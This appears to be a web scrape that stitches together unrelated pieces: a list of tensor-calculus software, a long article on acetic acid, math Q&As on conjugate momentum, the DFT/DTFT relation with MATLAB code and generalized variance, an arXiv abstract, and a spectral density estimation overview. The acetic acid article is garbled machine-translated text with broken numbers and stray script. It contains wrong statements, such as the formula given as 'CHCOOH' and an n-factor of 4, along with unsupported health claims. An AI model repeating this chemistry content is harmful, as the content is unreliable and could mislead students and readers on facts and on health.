EDC and RGTC,即 Riemannian Geometry & Tensor Calculus @ Mathematica,链接:http://www.inp.demokritos.gr/~sbonano/RGTC/
• Download all files – compressed: .sit format (100 KB), .zip format (135 KB)
• Uncompressed files (~1000 KB): RGTC.nb — OperatorPLT.nb — NPsymbolPLT.nb — EDCRGTCcode.m. (Only the combined matrixEDC and RGTC code in package format is included — it must be placed in an appropriate directory).
• Note: RGTC cannot be used for calculations with abstract tensors (manipulation of tensor expressions with abstract indices). It only operates on explicit tensors (nested lists of components which are functions of the coordinates). For abstract calculations try the package xTensor.
Additional Examples can be found here.
## Standalone software
• SPLATT[1] is an open source software package for high-performance sparse tensor factorization. SPLATT ships a stand-alone executable, C/C++ library, and Octave/MATLABAPI.
• Cadabra[2] is a computer algebra system (CAS) designed specifically for the solution of problems encountered in field theory. It has extensive functionality for tensor polynomial simplification including multi-term symmetries, fermions and anti-commuting variables, Clifford algebras and Fierz transformations, implicit coordinate dependence, multiple index types and many more. The input format is a subset of TeX. Both a command-line and a graphical interface are available.
• Tela[3] is a software package similar to Matlab and (GNU) Octave, but designed specifically for tensors.
## Software for use with Mathematica
• Tensor[4] is a tensor package written for the Mathematica system. It provides many functions relevant for General Relativity calculations in general Riemann-Cartan geometries.
• Ricci[5] is a system for Mathematica 2.x and later for doing basic tensor analysis, available for free.
• TTC[6] Tools of Tensor Calculus is a Mathematica package for doing tensor and exterior calculus on differentiable manifolds.
• EDC and RGTC,[7] “Exterior Differential Calculus” and “Riemannian Geometry & Tensor Calculus,” are free Mathematica packages for tensor calculus especially designed but not only for general relativity.
• Tensorial[8] “Tensorial 4.0” is a general purpose tensor calculus package for Mathematica.
• xAct:[9] Efficient Tensor Computer Algebra for Mathematica. xAct is a collection of packages for fast manipulation of tensor expressions.
• GREAT[10] is a free package for Mathematica that computes the Christoffel connection and the basic tensors of General Relativity from a given metric tensor.
• Atlas 2 for Mathematica[11] is a powerful Mathematica toolbox which allows to do a wide range of modern differential geometry calculations
• GRTensorM[12] is a computer algebra package for performing calculations in the general area of differential geometry.
• MathGR[13] is a package to manipulate tensor and GR calculations with either abstract or explicit indices, simplify tensors with permutational symmetries, decompose tensors from abstract indices to partially or completely explicit indices and convert partial derivatives into total derivatives.
• TensoriaCalc[14] is a tensor calculus package written for Mathematica 9 and higher, aimed at providing user-friendly functionality and a smooth consistency with the Mathematica language itself. As of January 2015, given a metric and the coordinates used, TensoriaCalc can compute Christoffel symbols, the Riemann curvature tensor, and Ricci tensor/scalar; it allows for user-defined tensors and is able to perform basic operations such as taking the covariant derivatives of tensors. TensoriaCalc is continuously under development due to time constraints faced by its inventor/developer.
## Software for use with Maple
• GRTensorII[15] is a computer algebra package for performing calculations in the general area of differential geometry.
• Atlas 2 for Maple[16] is a modern differential geometry for Maple.
• DifferentialGeometry[17] is a package which performs fundamental operations of calculus on manifolds, differential geometry, tensor calculus, General Relativity, Lie algebras, Lie groups, transformation groups, jet spaces, and the variational calculus. It is included with Maple.
## Software for use with Maxima
Maxima[23] is a free open source general purpose computer algebra system which includes several packages for tensor algebra calculations in its core distribution. It is particularly useful for calculations with abstract tensors, i.e., when one wishes to do calculations without defining all components of the tensor explicitly. It comes with three tensor packages:[24]
• itensor for abstract (indicial) tensor manipulation,
• ctensor for component-defined tensors, and
• atensor for algebraic tensor manipulation.
## Software for use with R
• Tensor[25] is an R package for basic tensor operations.
• rTensor[26] provides several tensor decomposition approaches.
• tensorBF[27] is an R package for Bayesian Tensor decomposition.
• MTF[28] Bayesian Multi-Tensor Factorization for data fusion and Bayesian versions of Tensor PCA and Tensor CCA. Software: MTF
## Libraries
• Redberry[29] is an open source computer algebra system designed for symbolic tensor manipulation. Redberry provides common tools for expression manipulation, generalized on tensorial objects, as well as tensor-specific features: indices symmetries, LaTeX-style input, natural dummy indices handling, multiple index types etc. The HEP package includes tools for Feynman diagrams calculation: Dirac and SU(N) algebra, Levi-Civita simplifications, tools for calculation of one-loop counterterms etc. Redberry is written in Java and provides extensive Groovy-based programming language.
• libxm[30] is a lightweight distributed-parallel tensor library written in C.
• FTensor[31] is a high performance tensor library written in C++.
• TL[32] is a multi-threaded tensor library implemented in C++ used in Dynare++. The library allows for folded/unfolded, dense/sparse tensor representations, general ranks (symmetries). The library implements Faa Di Bruno formula and is adaptive to available memory. Dynare++ is a standalone package solving higher order Taylor approximations to equilibria of non-linear stochastic models with rational expectations.
• vmmlib[33] is a C++ linear algebra library that supports 3-way tensors, emphasizing computation and manipulation of several tensor decompositions.
• Spartns[34] is a Sparse Tensor framework for Common Lisp.
• FAstMat[35] is a thread-safe general tensor algebra library written in C++ and specially designed for FEM/FVM/BEM/FDM element/edge wise computations.
• Cyclops Tensor Framework [36] is a distributed memory library for efficient decomposition of tensors of arbitrary type and parallel MPI+OpenMP execution of tensor contractions/functions.
• TiledArray[37] is a scalable, block-sparse tensor library that is designed to aid in rapid composition of high-performance algebraic tensor equation. It is designed to scale from a single multicore computer to a massively-parallel, distributed-memory system.
• libtensor [38] is a set of performance linear tensor algebra routines for large tensors found in post-Hartree-Fock methods in quantum chemistry.
• ITensor [39] features automatic contraction of matching tensor indices. It is written in C++ and has higher-level features for quantum physics algorithms based on tensor networks.
• Fastor [40] is a high performance C++ tensor algebra library that supports tensors of any arbitrary dimensions and all their possible contraction and permutation thereof. It employs compile-time graph search optimisations to find the optimal contraction sequence between arbitrary number of tensors in a network. It has high level domain specific features for solving nonlinear multiphysics problem using FEM.
• Xerus [41] is a C++ tensor algebra library for tensors of arbitrary dimensions and tensor decomposition into general tensor networks (focusing on matrix product states). It offers Einstein notation like syntax and optimizes the contraction order of any network of tensors at runtime so that dimensions need not be fixed at compile-time.
## 用Mathematica计算一元高次方程
15000*(1+x)^10=20000
|
# Molar Mass of Acetic Acid
Let us know what is the molar mass of acetic acid. So now we begin. A specific bottle of food vinegar that you canfind in the kitchen of any housewife is in the composition of many other acids and vitamins. Adding a few drops of the product to cooked food, causes a natural enhancement of the salad taste. But few of us really think about the properties and actual scales of application of the main ingredient acetic acid .
• Formula: CH₃COOH
• Molar Mass of Acetic Acid: 60.052 g/mol
• IUPAC ID: Acetic acid
• Density: 1.05 g/cm³
• Boiling point: 244.4°F (118°C)
• Melting point: 61.88°F (16.6°C)
• Classification: Carboxylic acid
## What is this substance?
Acetic acid has the formula CH3COOH , which combines it with a number of fatty carboxylic acids. The presence of a carboxyl group (COOH) denotes monobasic acid. The substance is found in the world in organic form and is obtained artificially in laboratories. Acid is the simplest, but no less important representative of its series, easily soluble in water, hygroscopic.
The physical properties of acetic acid and the density vary depending on the temperature regime. At room temperature at 20 aboutC acid is in liquid state, its density is 1.05 g / cm3. Has a specific odor and sour taste. The solution of the substance without impurities hardens at a temperature below 17 and passes into crystalsaboutC. The process of boiling acetic acid begins at a temperature higher than 117aboutC. The methyl group (CH3) is obtained from the interaction of alcohol with oxygen of the acetic acid formula: fermentation of alcohol substances and carbohydrates, souring of wines.
### A bit of history
Vinegar was the first acid in the series to be discover and done in phases. Initially, acetic acid distilled from the 8th century began to be extracted by Arab scientists. However, even in ancient Rome, this substance, derived from sour wine, was use as a universal sauce. The name in Ancient Greek translates as “sour”. In the 17th century, scientists in Europe managed to extract the pure substance of the substance. At that time, he obtained the formula and found an unusual ability – acetic acid in the steam state was ignited by blue fire.
Until the 19th century, scientists discovered the presence of acetic acid only in organic form – as part of compounds of salts and esters. In the composition of plants and their fruits: apples, grapes In the body of humans and animals: sweat secretion, bile At the beginning of the 20th century, Russian scientists accidentally extracted acetic aldehyde from the reaction of acetylene with mercury oxide. To date, the consumption of acetic acid is so great that its main production is only largely synthetically.
### withdrawal methods
Whether pure acetic acid or with the presence of impurities in the solution depends on the method of extraction. Edible acetic acid is obtain by a biochemical method in the process of ethanol fermentation. In industry, several methods of extracting acid are isolated. As a rule, reactions with a high temperature and with the presence of a catalyst:
• Methanol (carbonylation) in reaction with carbon.
• Oxidation of the oil fraction with oxygen
• pyrolysis of wood
• Acetaldehyde oxidation with oxygen
The industrial way is more efficient and economical than the biochemical one. Thanks to the industrial method, the volume of production of acetic acid has increased hundreds of times in the 20th and 21st centuries, compared to the 19th century. To date, the synthesis of acetic acid by carbonation of methanol gives more than 50% of the total amount produced.
## Physical properties of acetic acid and its effect on the indicator
In the liquid state, acetic acid is colorless. Acidity levels of pH 2,4 are easily tested with a litmus test. When acetic acid stains the indicator, it is red. The physical properties of acetic acid vary widely. When the temperature drops below 16 about C, the substance takes on a solid form and resembles small ice crystals. It readily dissolves in water and interacts with a wide range of solvents, except hydrogen sulfide. Acetic acid reduces the total volume of the liquid when diluted with water. Describe independently the physical properties of acetic acid, its color and consistency, which you see in the following figure.
This substance ignites at a temperature of 455about876 kJ / mol with the release of heat. The molar mass is 60.05 g / mol. The physical properties of acetic acid as an electrolyte in reactions weaken. The permittivity is 6.15 at room temperature. Pressure, such as density, – Variable physical value of acetic acid at a pressure of 40 mm Hg. Art. And at a temperature of about 42C the boiling process will begin but already under a pressure of 100 mm. Hg. Art. Boiling occurs only at 62 about
## Chemical Properties
Reaction with metals and oxides, the substance shows its acid properties. Excellent dissolve a more complex compounds, acid forms salts which:. Magnesium, potassium acetate is called lead, etc. The pK value of the acid is 4.75.
When interacting with gases, vinegar enterssubstitution reaction with the subsequent displacement and formation of more complex acids: chloroacetic, iodoacetic. Dissolving in water, the acid dissociates with the release of acetate ions and hydrogen protons. The degree of dissolution is 0.4 percent.
The physical and chemical properties of acetic acid in a crystalline form form diamonds on hydrogen bonds. In addition, its properties are needed when creating more complex fatty acid, steroid and sterol biosynthesis.
## Lab Test
Detect acetic acid in solution to account for the identification of its physical properties, for example odor. It is enough to add a strong acid to the solution, which will begin to displace the vinegar salt with the release of its vapors. By laboratory distillation of CH3COA and H2SO4 it is possible to obtain acetic acid in dry form.
We will draw experience from the school program on Chemistry 8 class. The physical properties of acetic acid clearly demonstrate the chemical reaction of dissolution. It is enough to add copper oxide to the solution of the substance and lightly heat it. The oxide forms a completely soluble colored solution.
### derivatives agents
Qualified reactions of the substance with manysolution forms: esters, amides and salts. However, during the manufacture of other substances, the requirements for the physical properties of acetic acid remain high. It should always have high dissolution, and therefore, no third party impurities.
Depending on the concentration of acetic acidaqueous solution, many of its derivatives differ. The concentration of the substance more than 96% bears the name – glacial acetic acid. Acetic acid in 70-80% can be purchased at grocery stores, where it will be called – acetic essence. Table vinegar has a concentration of 3-9%.
### Acetic acid and everyday life
In addition to food characteristics, acetic acid has a number of physical properties, thanks to which mankind has found its application in everyday life. A solution of a substance of low concentration easily removes plaque from the surface of metal products, mirrors and windows. The ability to absorb moisture also plays a good role. Vinegar well removes odors in heat premises, removes stains from vegetables and fruits on clothes.
As it turned out, the physical property of acetic acid – to remove fat from the surface – can find application in folk medicine and cosmetology. A emollient solution of edible vinegar is rubbed with hairs to give them shine. The substance is widely use to treat colds, remove gums and skin fungus. The use of vinegar as part of cosmetic wraps to fight cellulite is gaining momentum.
## Use in Production
In compounds of salts and other complex substances, acetic acid is an essential element:
• Pharmaceutical industry for making: aspirin, antiseptic and antibacterial ointments, phenacetin.
• Manufacture of synthetic fibres. Non-combustible films, cellulose acetate.
• Food industry for successful preservation, as food additive E260, preparation of marinades and sauces.
• Textile industry It is part of the dyes.
• Manufacture of cosmetics and hygiene products. Aromatic oils, creams to improve skin tone.
• Banana mordant is used as an insecticide and mordant against weeds.
• Varnish manufacturing. Technical solvents, acetone production.
Annually increases the production of acetic acid. Its volume in the world today exceeds 400 thousand tons per month. The acid is delivered in a reinforced steel tank. Due to the high physical and chemical activity of acetic acid, storage in plastic containers is restricted or limited to several months in many production facilities.
### Security
Acetic acid of high concentration has the third degree of ignition and releases toxic fumes. It is recommended to wear special gas masks and other personal protective equipment when working with acids. A lethal dose for the human body from 20 ml. At the time of injection, the acid first burns the mucous membrane, and then affects other organs. In such cases, immediate hospitalization is required.
After getting acid on exposed areas of the skin, it is advisable to immediately wash them with running water. Surface burns with acid can cause tissue necrosis, which requires hospitalization.
## interesting facts
Physiologists have found that a person can do without food additives at all – acetic acid is absolutely necessary. But with acid intolerance, as well as with stomach problems, the substance is contraindicated.
• Acetic acid is used in book printing.
• The substance was found in small amounts in honey, banana and wheat.
• With a container of acetic acid and vzboltav cooling, you can see its sharp congealing.
• A small concentration of acetic acid can reduce symptoms of pain from an insect bite, as well as minor burns.
• The intake of food products with a low content of acetic acid reduces the level of cholesterol in the body. The substance stabilizes the level of sugar well in diabetics.
• The use of protein and carbohydrate food together with a small amount of acetic acid enhances their digestibility by the body.
• If the food is salty, add a few drops of vinegar to smooth out the brine.
### Finally
Millennium Uses of Acetic AcidDue to the fact that its physical and chemical properties find their application at every step. Hundreds of possible reactions, thousands of useful substances, to which humanity moves. The main thing is to know all the features of acetic acid, its positive and negative properties.
Do not forget about the benefits, but you should alwaysremember what harm can be caused by careless handling of acetic acid of high concentration. By its danger, it stands out next to hydrochloric and sulfuric acids. Always remember about safety when using acid. Properly and carefully dilute the essence with water.
### What is the molar mass of acetic acid in grams?
60.05 = 60.05⋅g⋅moएल -1।
#### What is the molecular mass of CH3COOH in U?
60.06 g/mol (Molar mass of CH3COOH = 60.06 g/mol )
#### What is the equivalent weight of CH3COOH?
24.02 + 4.032 + 32 = 60.05 g / mol . Equivalent weight of acetic acid. E = 60÷1 = 60 (the molecular weight of acetic acid is 60)
#### What is the mass percentage of CH3COOH?
Percentage Composition by Element
### What is the equivalent weight of acetic acid*?
60u acetic acid contains a replaceable hydrogen. Thus, the equivalent weight of acetic acid is 60u .
### What is the mass of acetic acid present in 0.1 mole of it?
Thus, option $3) 0.60g$ will be the correct answer.
### Why is acetic acid written as CH3COOH?
A chemical formula of a compound represents the chemical nature of compounds. Since acetic acid is an organic acid that contains the -COOH group, the chemical formula must include this group. … Therefore, the correct formula for acetic acid is CHCOOH.
### What is the N factor of CH3COOH?
The n factor of CH3COOH is 1 .
### What type of compound is CH3COOH?
vinegar acid
Acetic acid is an organic compound with the formula CH3COOH. It is a carboxylic acid containing a methyl group attached to a carboxyl functional group.
### What is the basicity of acetic acid?
There are 4 hydrogen atoms present in the acetic acid molecule, with only one replaceable hydrogen ion present. Hence giving only one ionizable H+ ion, so its alkalinity is 1. So we can determine that the alkalinity of acetic acid is 1 because it releases a hydrogen ion in an aqueous solution.
### What is the mEq of acetic acid?
Milliequivalents (mEq) are equal to mass/1000, so 1.00 mEq = 75.0435/1000 = 0.075 g/L of tartaric acid. The maximum volatile acidity, calculated as acetic acid, is 0.14 g per 100 ml for natural red wines and 0.12 g/100 ml for other wines.
#### 10 What is the normality of acetic acid?
The chemical formula of 1.67N acetic acid is CH3CO2H. In the case of acetic acid, 1N solution is equal to 1M solution. Therefore, the normality of 10% acetic acid as calculated would be 1.67N .
### What is the mass percentage of CH3COOH in vinegar?
Vinegar is 5.0% acetic acid, CH3COOH, by mass.
### How many Molar Mass of Acetic Acid (CH3COOH)?
It consists of two carbon (C) atoms, four hydrogen (H) atoms and two oxygen (O) atoms . Hope this will help you.
### What is the equivalent weight of H3PO4?
H3PO. The equivalent weight of 4 is 49 .
### How is equal weight calculated?
Equivalent Weight = Molecular Weight / Valency
### What is N-Factor?
For bases, the n-factor is defined as the number of OH- ions in a reaction to be replaced by 1 mole of the base . Note that the n-factor is not equal to its acidity i.e. the number of moles of OH- ions present in 1 mole of base. For example, n-factor of NaOH = 1. n-factor 2 of Zn(OH) = 1 or 2.
### How do you make a solution of 1 molar acetic acid?
To make a 1 M solution of acetic acid, dissolve 60.05 g of acetic acid in 500 mL of distilled or deionized water in a 1-L volumetric flask . Since acetic acid is a liquid, acid can also be measured by volume. Divide the mass of the acid by its density (1.049 g/mL) to determine the volume (57.24 mL).
### How do you make 50 mM acetic acid?
You can create this buffer in the following ways:
1. Dissolve 2.87 ml of glacial acetic acid in 375 ml of water. ,
2. Dissolve 1.84 ml of glacial acetic acid and 1.48 g of sodium acetate in 350 ml of water and confirm the pH with a pH meter.
### What is the pH of 0.1 M acetic acid?
2.87 Acetic acid with a molar concentration of 0.1 M has a pH of 2.87 , and 0.0001 M acetic acid has a pH of 4.3.
### What is the molecular geometry of CH3COOH?
tetrahedral
We have to first draw the Lewis structure of acetic acid. In this atom four atoms are directly linked and not lone pairs. Its electron geometry and its molecular geometry are both tetrahedral like that of methane. February 8, 2017See also How to get the state of decay 2 effect
### What does CH3COOH mean?
Acetic acid (CH3COOH), also known as ethanoic acid, is the most important of the carboxylic acids. A dilute (about 5 percent volume) solution of acetic acid produced by fermentation and oxidation of natural carbohydrates is called vinegar; The salt, ester or acylyl of acetic acid is called an acetate.
### What does CH3COOH mean on the periodic table?
Vinegar Acid | CH3COOH – PubChem.
### What is the value of N factor in acetic acid?
Therefore, your n-factor is 4 .
### What is molecular weight and equivalent weight?
The key difference between gram molecular weight and gram equivalent weight is that the term gram molecular weight means the mass of a molecule in grams , which is numerically equal to the molecular weight of that substance, whereas the term gram equivalent weight refers to an equivalent in grams. refers to the mass of .
### What is the chemical formula of acetic acid?
Acetic Acid / Formula
Acetic acid, systematically named ethanoic acid, is an acidic, colorless liquid and organic compound with the chemical formula CH3COOH (also written CH3CO2H, C2H4O2, or HC2H3O2). August 17, 2021
### Is CH3COOH an acid or a base?
weak acid (such as CH3COOH) is in equilibrium with its anion in water and its conjugate (CH3COO-, a weak base) is also in equilibrium in water.
### Is CH3COOH a carbohydrate?
general formula of carbohydrates
Let’s take a look at acetic acid which is CH3COOH. Now although it is based on the general formula of carbohydrates i.e. C. Will fit in X (H 2 O) You , we know that acetic acid is not a carbohydrate . Formaldehyde (HCHO) also falls under this general formula category, but it is also not a carbohydrate.
|
# Definition of conjugate momentum on a manifold
I have trouble understanding this definition:
Let $$Q$$ be some manifold and $$L: TQ \to \mathbb{R}$$ a smooth function. Then for some local coordinates $$(q, \dot{q})$$ on $$TQ$$ the conjugated momentum is defined as $$\frac{\partial L}{\partial \dot{q}}$$, which is an element of the co-tangential bundle $$T^{*}Q$$.
How is the expression $$\frac{\partial L}{\partial \dot{q}}$$ to be interpreted? If one simply expresses $$L$$ in local coordinates by $$L \circ(q^{-1}, \dot{q}^{-1}): \mathbb{R}^{2n} \to \mathbb{R}$$ and differentiates it with respect to the second variable one gets a function $$\mathbb{R}^n \to \mathbb{R}$$ and not an element of the co-tangential bundle $$T^{*}Q$$. Is the correct expression $$\partial_2 ( L \circ(q^{-1}, \dot{q}^{-1}))\circ (q, \dot{q}) \in T^{*}Q\ ?$$
• yes, the issue is that the derivatives you get away from $0 \in \Bbb R^n$ are not actually independent of the choice of local coordinates in any reasonable sense. The only invariant data is what you're writing down along the 0-section. – user98602 Dec 31 '18 at 0:39
The notation $$\partial L/\partial\dot{q}$$ is no more than a symbol that denotes the Frechet derivative of $$L$$ with respect to $$\dot{q}$$. More precisely, let $$L:Q\times TQ\to\mathbb{R}.$$ Then for all $$x\in Q$$, $$T_xQ$$ is a vector space equipped with the norm induced by the metric on $$Q$$. In this sense, one may define a bounded linear operator $$A:TQ\to\mathbb{R}$$, such that $$\lim_{Y\to 0}\frac{\left\|L(x,X+Y)-L(x,X)-A(Y)\right\|_{\mathbb{R}}}{\left\|Y\right\|_{T_xQ}}=0$$ for a given $$x\in Q$$ and a given $$X\in T_xQ$$. This linear operator $$A$$, if it exists, is called the partial derivative of $$L$$ with respect to $$X$$, also denoted by $$\partial L/\partial X$$ for intuition. Further, if one considers a trajectory $$q:\mathbb{R}\to Q$$, we have $$\dot{q}:\mathbb{R}\to T_{q}Q$$. Hence when considering the special form $$L(q,\dot{q})$$, we also take $$\partial L/\partial\dot{q}$$ instead of $$\partial L/\partial X$$, again, for intuition.
Finally, whatever the notation is assigned to the operator defined above, either $$A$$ or $$\partial L/\partial X$$ or $$\partial L/\partial\dot{q}$$, it is (1) linear and is (2) from $$TQ$$ to $$\mathbb{R}$$. On the other hand, the collection of all linear operators from $$TQ$$ to $$\mathbb{R}$$ is definitely $$T^*Q$$. Therefore, it follows that $$A\in T^*Q,\quad\text{or}\quad\frac{\partial L}{\partial X}\in T^*Q,\quad\text{or}\quad\frac{\partial L}{\partial\dot{q}}\in T^*Q.$$
|
# Link between DFS, DFT, DTFT
My understanding of DFT is as follows
For a signal $x[n]$ of finite-length, the DFT is DFS of the periodic extension, $\tilde{x}[n]$, of that signal $x[n]$ and also another way to view DFT is that it’s a sampling of continuous DTFT.
Given that it is possible to reconstruct a original signal from sampled signal, provided the sampling is greater than Nyquist frequency. We know that the DTFT for sampled signal is a series of replications of the spectrum of the original signal at frequencies spaced by the sampling frequency. Now, since DTFT is continuous and periodic, we can further breakdown DTFT at intervals and still be possible to reconstruct the DTFT and consequently the original signal. This act of breaking down or sampling the DTFT is called DFT.
Is my interpretation of DFT correct? I would welcome any (true) facts or implications to test my understanding
Yes your understanding is basically correct.
The 1st paragraph (2 lines) expresses the fundamental relation between the DFS and the DFT of a finite-length sequence $x[n]$ while the 2nd paragraph tries to put down the relation between the DFT $X[k]$ of a sequence and the DTFT $X(e^{j\omega})$ of it (assuming it exists).
However this 2nd paragraph shall better be rephrased like this: given a finite length sequence $x[n]$ of length $N$ whose DTFT is:
$$X(e^{j\omega}) = \sum_{n=0}^{N-1} {x[n] e^{-j\omega n}}$$
it will have its $N$-point DFT $X[k]$ defined and computed as the uniform samples of its DTFT $X(e^{j\omega})$ taken at $N$ frequency points $\omega_k = \frac{2 \pi}{N} k$ for $k=0,1,...,N-1$ .
It's important to recognise that some important class of aperiodic signals which are of infinite length, such as $x[n] = a^n u[n]$, will not have a valid $N$-point DFT representation for any (finite) $N$, nor will it have a valid finite DFS representation as it's not a periodic signal. Such a signal requires infinitely many samples for its DFT to exactly represent it.
In practice, for the above sequence, a truncated (windowed) exponential can be used to approximate the infinite length sequence. For practical applications one can always find a large enough finite $N$ that will reduce the error of the approximation down to an acceptable level.
In addition, for infinite length aperiodic signals such as the above $x[n]=a^n u[n]$, whose DTFT $X(e^{j\omega})$ exists and is given by $X(e^{j\omega})= \frac{1}{1-a e^{-j\omega}}$ for some suitable $a$, one can think of the following scenerio: Relying on the alternate definition of DFT, $X[k]$ of a sequence as being the uniform samples of the DTFT $X(e^{j\omega})$ of that sequence $x[n]$ what happens when we take $N$ uniform samples of $X(e^{j\omega})$ as:
$$X[k] = X(e^{j\frac{2\pi k}{N}})= \frac{1}{1-a e^{-j\frac{2\pi}{N}k}} ~,~ k=0,1,...,N-1$$
And by assuming that these N-samples of DTFT, constitude a proper (valid) DFT representation of some N-point finite length sequence $x_a[n]$, we convert those $N$ DFT samples back into time domain using the $N$-point inverse DFT.
What's the relation between the finite length sequence $x_a[n]$ (that's returned by the N-point IDFT of the N uniform samples of DTFT $X(e^{j\omega})$ of the sequence $x[n] = a^n u[n]$) and the infinite length sequence $x[n] = a^n u[n]$...?
It can be shown that, $x_a[n]$ will be a time-aliased version of the infinite length signal $x[n]=a^n u[n]$ defined with the following relation:
$$\tilde{x}_a[n] = \sum_r { x[n-rN] }$$
Which can be viewed as the periodic extension of the infinite length signal $x[n]$ by N, however, the tails of $x[n]$ should sum up to finite values (converge) for $x_a[n]$ to exist. This will be the case , for example, when $|a| <1$ for the above exponential...
Furthermore, there is an important practical issue that arise when DFT is computed through an FFT using a computer program such as MATLAB/Octave. Consider the case when an even symmetric sequence h[n] has a region of support from $-M$ to $M$, lets go concrete and put $M = 2$ for simplicty and assume
$$h[n]=\delta [n+2] +2 \delta[n+1] + 3\delta[n] +2\delta [n-1] +1\delta[n-2]$$
The DTFT of such an even symmetric real sequence h[n] will be real and even (hence will have zero phase) as given by:
$$X(e^{j\omega}) = \sum_{n=-2}^{2} {x[n] e^{-j\omega n}}$$
Therefore we can conclude that its $5$-point DFT $H[k]$ will also be a real, even, zero-phase sequence. Lets compute its DFT using MATLAB :
h = [1 2 3 2 1]; % The row-vector as 1x5 matrix to hold the sequence h[n]
fft(h,5) % DFT of h[n] ?
The output is :
9.0000 , -2.1180 - 1.5388i , 0.1180 + 0.3633i , 0.1180 - 0.3633i , -2.1180 + 1.5388i
This is not the expected result. And the reason is here MATLAB computes not the DFT of the original sequence $h[n]$ but the DFT of a shifted verison $b[n] = h[n-2]$ so that $b[n]$ is a causal sequence that begins from the index $n=0$. Using a little DTFT properties one can show that :
$$B(e^{j\omega}) = e^{-j 2\omega} H(e^{j\omega})$$
and the DFT therefore will be:
$$B[k] = e^{-j 2 \frac{2\pi}{5} k} H[k] ~,~ k=0,1,2,3,4$$
Where $H[k]$ is the samples of the zero phase DFT corresponding to even-symmetric sequence h[n] , and $B[k]$ corresponding to what MATLAB computes.
If for some reasons you have to recover $H[k]$ from $B[k]$ then you would compute: $$H[k] = e^{j 2 \frac{2\pi}{5} k} B[k] ~,~ k=0,1,2,3,4$$
as the following line of code reveals:
exp(j*2*pi*[0:4]*2/5).*fft([1 2 3 2 1],5) % output is :
9.0000 2.6180 0.3820 0.3820 2.6180
The same result could also be obtained by the input shifting as well:
fft([3 2 1 1 2],5)
|
3 years ago
# Hyperpolarization of Amino Acid Derivatives in Water for Biological Applications.
S. Wagner, S. Glöggler, Louis-S. Bouchard
We report on the successful synthesis and hyperpolarization of N unprotected {\alpha} amino acid ethyl acrylate esters and extensively, on an alanine derivative hyperpolarized by PHIP (4.4$\pm$1% $^{13}$C-polarization), meeting required levels for in vivo detection. Using water as solvent increases biocompatibility and the absence of N-protection is expected to maintain biological activity.
Publisher URL: http://arxiv.org/abs/1711.01553
DOI: arXiv:1711.01553v1
You might also like
Discover & Discuss Important Research
Keeping up-to-date with research can feel impossible, with papers being published faster than you'll ever be able to read them. That's where Researcher comes in: we're simplifying discovery and making important discussions happen. With over 19,000 sources, including peer-reviewed journals, preprints, blogs, universities, podcasts and Live events across 10 research areas, you'll never miss what's important to you. It's like social media, but better. Oh, and we should mention - it's free.
Researcher displays publicly available abstracts and doesn’t host any full article content. If the content is open access, we will direct clicks from the abstracts to the publisher website and display the PDF copy on our platform. Clicks to view the full text will be directed to the publisher website, where only users with subscriptions or access through their institution are able to view the full article.
|
# Generalized variance
Generalized variance is the determinant of correlation matrix. Does increasing the off-diagonal entries (correlation coefficients) decreases the determinant? Is a proof available? All elements are positive. Can we deduce from Hadamard inequality of determinant?
-
The determinant of the covariance matrix could be considered a generalization of variance, in that it's equal to the scalar variance in the case of dimension 1. But the determinant of the correlation matrix, as opposed to the covariance matrix, is not in that sense a generalization of the variance. – Michael Hardy Aug 27 '11 at 11:46
Thanks for the proper definition. – shakera Aug 27 '11 at 12:15
It can do either. $\;$ Suppose the correlation matrix is $\begin{bmatrix} 1 & x \\ x & 1 \end{bmatrix}$.
$\operatorname{det}\left(\begin{bmatrix} 1 & x \\ x & 1 \end{bmatrix}\right) = 1\cdot 1-x\cdot x = 1-x^2$
If $x<0$ then increasing the off-diagonal entries increases the determinant.
If $0<x$ then increasing the off-diagonal entires decreases the determinant.
Thanks... Does it generalizes for $N$. Let us supposes all elements of the correlation matrix are positive. – shakera Aug 27 '11 at 9:25
|
# Spectral density estimation
For the statistical concept, see probability density estimation.
For a broader coverage related to this topic, see Spectral density.
In statistical signal processing, the goal of spectral density estimation (SDE) is to estimate the spectral density (also known as the power spectral density) of a random signal from a sequence of time samples of the signal. Intuitively speaking, the spectral density characterizes the frequency content of the signal. One purpose of estimating the spectral density is to detect any periodicities in the data, by observing peaks at the frequencies corresponding to these periodicities.
Some SDE techniques assume that a signal is composed of a limited (usually small) number of generating frequencies plus noise and seek to find the location and intensity of the generated frequencies. Others make no assumption on the number of components and seek to estimate the whole generating spectrum.
## Overview
Example of voice waveform and its frequency spectrum
A periodic waveform (triangle wave) and its frequency spectrum, showing a "fundamental" frequency at 220 Hz followed by multiples (harmonics) of 220 Hz.
The power spectral density of a segment of music is estimated by two different methods, for comparison.
Spectrum analysis, also referred to as frequency domain analysis or spectral density estimation, is the technical process of decomposing a complex signal into simpler parts. As described above, many physical processes are best described as a sum of many individual frequency components. Any process that quantifies the various amounts (e.g. amplitudes, powers, intensities, or phases), versus frequency can be called spectrum analysis.
Spectrum analysis can be performed on the entire signal. Alternatively, a signal can be broken into short segments (sometimes called frames), and spectrum analysis may be applied to these individual segments. Periodic functions (such as ) are particularly well-suited for this sub-division. General mathematical techniques for analyzing non-periodic functions fall into the category of Fourier analysis.
The Fourier transform of a function produces a frequency spectrum which contains all of the information about the original signal, but in a different form. This means that the original function can be completely reconstructed (synthesized) by an inverse Fourier transform. For perfect reconstruction, the spectrum analyzer must preserve both the amplitude and phase of each frequency component. These two pieces of information can be represented as a 2-dimensional vector, as a complex number, or as magnitude (amplitude) and phase in polar coordinates (i.e., as a phasor). A common technique in signal processing is to consider the squared amplitude, or power; in this case the resulting plot is referred to as a power spectrum.
Because of reversibility, the Fourier transform is called a representation of the function, in terms of frequency instead of time; thus, it is a frequency domain representation. Linear operations that could be performed in the time domain have counterparts that can often be performed more easily in the frequency domain. Frequency analysis also simplifies the understanding and interpretation of the effects of various time-domain operations, both linear and non-linear. For instance, only non-linear or time-variant operations can create new frequencies in the frequency spectrum.
In practice, nearly all software and electronic devices that generate frequency spectra utilize a discrete Fourier transform (DFT), which operates on samples of the signal, and which provides a mathematical approximation to the full integral solution. The DFT is almost invariably implemented by an efficient algorithm called fast Fourier transform (FFT). The squared-magnitude components of a DFT are a type of power spectrum called periodogram, which is widely used for examining the frequency characteristics of noise-free functions such as filter impulse responses and window functions. But the periodogram does not provide processing-gain when applied to noiselike signals or even sinusoids at low signal-to-noise ratios. In other words, the variance of its spectral estimate at a given frequency does not decrease as the number of samples used in the computation increases. This can be mitigated by averaging over time (Welch's method[1]) or over frequency (smoothing). Welch's method is widely used for SDE. However, periodogram-based techniques introduce small biases that are unacceptable in some applications. So other alternatives are presented in the next section.
## Techniques
